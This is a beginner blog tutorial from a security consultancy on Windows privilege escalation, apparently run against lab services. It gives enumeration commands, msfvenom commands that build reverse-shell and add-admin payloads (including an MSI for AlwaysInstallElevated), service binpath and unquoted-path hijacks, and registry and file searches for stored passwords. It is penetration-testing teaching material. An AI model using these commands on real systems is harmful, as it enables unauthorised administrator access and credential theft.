Privilege Escalation on Windows

Introduction

Operating systems are configured with multiple access roles from low privilege to high privilege for restriction of access to a data or resource. But if the system is misconfigured or having any other security vulnerabilities, then any low privilege user can take advantage of that to gain higher privileged access.

Privilege escalation is a process of escalating access of low privilege users to high privilege users, resulting in unauthorized access to restricted resources.

In our earlier blog we have demonstrated common ways to perform privilege escalation on linux machine. In this blog we will talk about privilege escalation on windows system.

Keep this checklist handy while testing windows privilege escation.

Objective

Once you get the initial shell on the target system, you already won half of the battle. To make this battle on your side, you need to get administrator group user or NT AUTHORITYSystem on the system. For the same, we need first to understand what are the ways to elevate current privilege.

This blog is mainly aimed at beginners to help them understand the fundamentals of Windows privilege escalation. We will see a different tool to find vulnerabilities.

Pre Condition

Assume that we have initially got limited access to the target Windows system. Now it’s time for enumeration.

Enumeration

OS version, installed patch information

    systeminfo

Hostname

    hostname

Current username

    whoami
    echo %username%

If whoami.exe is not available, upload the whoami.exe from /usr/share/windows-resources/binaries/whoami.exe to target system and run it.

List open connection

    netstat -anto

Display all local users

    net user

Windows firewall status

    netsh firewall show state

Routing table rules

    route print

List of running process

    tasklist /svc

List all the Services

    net start

File Permission

    cacls <file name>
    icacls <file name>

    Note: icacls is replacement of cacls,
    * icacls (Windows Vista +)
    * cacls (Windows XP)

Automated Tools

We will also use accesschk utilities of Microsoft sysinternal suite for manual verification.

According to my experience, WinPEAS gives more comprehensive results. We will be using WinPEAS for demonstration purposes. You can use any of the tools. To get started, all you need is to upload and run these scripts on the target machine. There are various ways to upload these scripts to the target system. Explaining all in this blog is not feasible. A simple google search will give you a way to do that. 😉

 

Service

Microsoft Windows service or NT service is non-GUI software that runs in the background. It automatically starts when the system boots. Service running with administrator or system privilege with incorrect file permission might lead to privilege escalation.

Check what all active/inactive services present on system.

    sc queryex type= service state= all

Check permissions of all services

    accesschk.exe /accepteula -uwcqv <current user name> *

1. Insecure Write Permission on Folder

Suppose you find any service running on the target with higher privilege and write permission on its executable binary. By replacing the service executable with a malicious executable, it is possible to gain higher privilege.

Check if any services are running with higher privilege:

    sc qc <service name>

demosvc3 service is running as LocalSystem privilege. LocalSystem account is a wholly trusted account, and it has extensive privilege on the local system.

Automated scan result shows that, Everyone has Full Access.

Manually you can check permissions using icacls/cacls:

It shows everyone has Full permission. Let’s generate demoservice3.exe using msfvenom and replace it with the original one.

    msfvenom -p windows/exec CMD="net localgroup administrators test /add" -f exe-service -o demo3service.exe

The generation of the above shellcode demonstrates adding a user “test” under the Administrators group. The switch -f stands for the file type exe-service and -o for the output of the file along with the filename Unquoted.exe.

    net stop demosvc3
    net start demosvc3

Upon restarting this service, test users added to the Administrators group.

Suggested ReadToken Stealing with Windows Update KB4054518

2. Insecure write permission on config file

If you have write permission on the service configuration file, you can change the service binary path to a malicious executable.

Check if any services are running with higher privilege:

    sc qc <service name>


demosvc1 service is also running as LocalSystem privilege.

Check if test user has access to modify service configuration.

    accesschk.exe /accepteula -uwcqv <current username> <service name>

It says that test user has full access to this service.

Generate executable shell and transfer this into the target system

    msfvenom -p windows/shell_reverse_tcp LHOST=<Your system IP> LPORT=<Your system port> -f exe > reverse.exe

Use sc command to change the binpath of vulnerable service.

    sc config demosvc1 binpath="c:userstestreverse.exe"

Restart the service.

    net stop demosvc1
    net start demosvc1

Start the listener on mentioned port. Bingo, Got NT AuthoritySystem access.

3. Unquoted Service Path

Any service executable whose path contains space and is not enclosed in the quote is vulnerable to this attack. E.g. C:Program FilesUnquoted Pathuqsp.exe

Automated scan results show that the service “demosvc” is vulnerable to unquoted service path vulnerability.

You can check manually using sc command:

    sc qc <service name>


In this case, the path of service executable is C:Program FilesUnquoted Pathuqsp.exe. It contains blank space and is not wrapped in a quote. When SCM(Service Control Manager) starts this service, it will look at the following paths in order, and it will run first exe that it will find:

    C:Program.exe
    C:Program FilesUnquoted.exe
    C:Program FilesUnquoted Pathuqsp.exe

Check permission on installed service folder.

    accesschk.exe /accepteula -uwdq "C:Program Files"

If we have write permission in “C” or “Program Files” folder, then we can generate our shellcode with the name (“Program.exe” or “Unquoted.exe”) and add that in the required folders.

    msfvenom -p windows/exec CMD="net localgroup administrators test /add" -f exe-service -o Unquoted.exe

Place the file “Unquoted.exe” under the “Program Files” folder.

Now restart the service “demosvc” to get your shell code executed.

The above image depicts that the user Test has been added successfully to the Administrators group.

Registry

Windows registry is a hierarchical database that contains information, setting or configuration of software and hardware.

4. Always Elevated Install

AlwaysInstallElevated setting allows a non-privileged user to run Microsoft Windows Installer Package (msi) with elevated privileges. Microsoft strongly discourages this policy. Our scan report already flagged this vulnerability.

Manually, all you need is to run below command to check the registry policy.

    reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
    reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

Note that REG_DWORD is set to 1
Next step is to generate a reverse shell using msfvenom of file type msi.

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<You systen IP> LPORT=<Your system port> -f msi -o kumar.msi

Transfer and run this msi file into the target system. It will give nt authoritysystem level access.

5. Insecure Storage

It is a good idea to check if any file contains hardcoded credentials in cleartext. WinPEAS tries to grep user and password strings in the file system, and it will give a list of files that contain user and password.

Findstr tool can be used to check for specific strings on the target machine.

    findstr /spin "credentials" *.*

Other than the file system, it is also possible that the vendor has kept credentials in registry.

    reg query HKLM /f password /t REG_SZ /s

To narrow down the result you can check for some specific registry

    reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon"
    reg query "HKLMSYSTEMCurrentControlSetServicesSNMP"
    reg query "HKCUSoftwareSimonTathamPuTTYSessions"
    reg query "HKCUSoftwareORLWinVNC3Password

In the next blog we will look into more ways to perform privilege escalation attack on Windows machine.

About Payatu

Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries

Get in touch with us. Click on the get started button below.

Subscribe to our Newsletter
Subscription Form

Research Powered Cybersecurity Services and Training. Eliminate security threats through our innovative and extensive security assessments.

Subscribe to our newsletter

Subscription Form

Services

Products

Conference

Resources

About

Iot Security Testing
Red Team Assessment
Product Security
AI/ML Security Audit
Web Security Testing
Mobile Security Testing
DevSecOps Consulting
Code Review
Cloud Security
Critical Infrastructure
ExPLIoT
CloudFuzz
Nullcon
Hardwear.io
Blog
E-Book
Advisory
Media
Case Studies
MasterClass Series
Securecode.wiki
About Us
Career
News
Contact Us
Payatu Bandits
WhatsApp Community
Hardware-Lab
Disclosure Policy
Corporate Partners
Youtube Linkedin Facebook Twitter Instagram Whatsapp
DOWNLOAD THE DATASHEET

Fill in your details and get your copy of the datasheet in few seconds

DOWNLOAD THE EBOOK

Fill in your details and get your copy of the ebook in few seconds

Ebook Download
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download ICS Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download Cloud Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download IoT Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download Code Review Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download Red Team Assessment Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download AI/ML Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download DevSecOps Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download Product Security Assessment Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download AI/ML Sample Report
DOWNLOAD A SAMPLE REPORT

Fill in your details and get your copy of sample report in few seconds

Download IoT Sample Report

Let’s make cyberspace secure together!

Requirements

Connect Now Form

What our clients are saying!

Trade Ledger takes privacy and security of it’s customers and system very seriously. We needed an independent audit to check our systems, and wanted to partner with a team that understands the compliance environment of banks.
MARTIN MECCAN
MARTIN MECCANCEO - TradeLedger Australia

Trusted by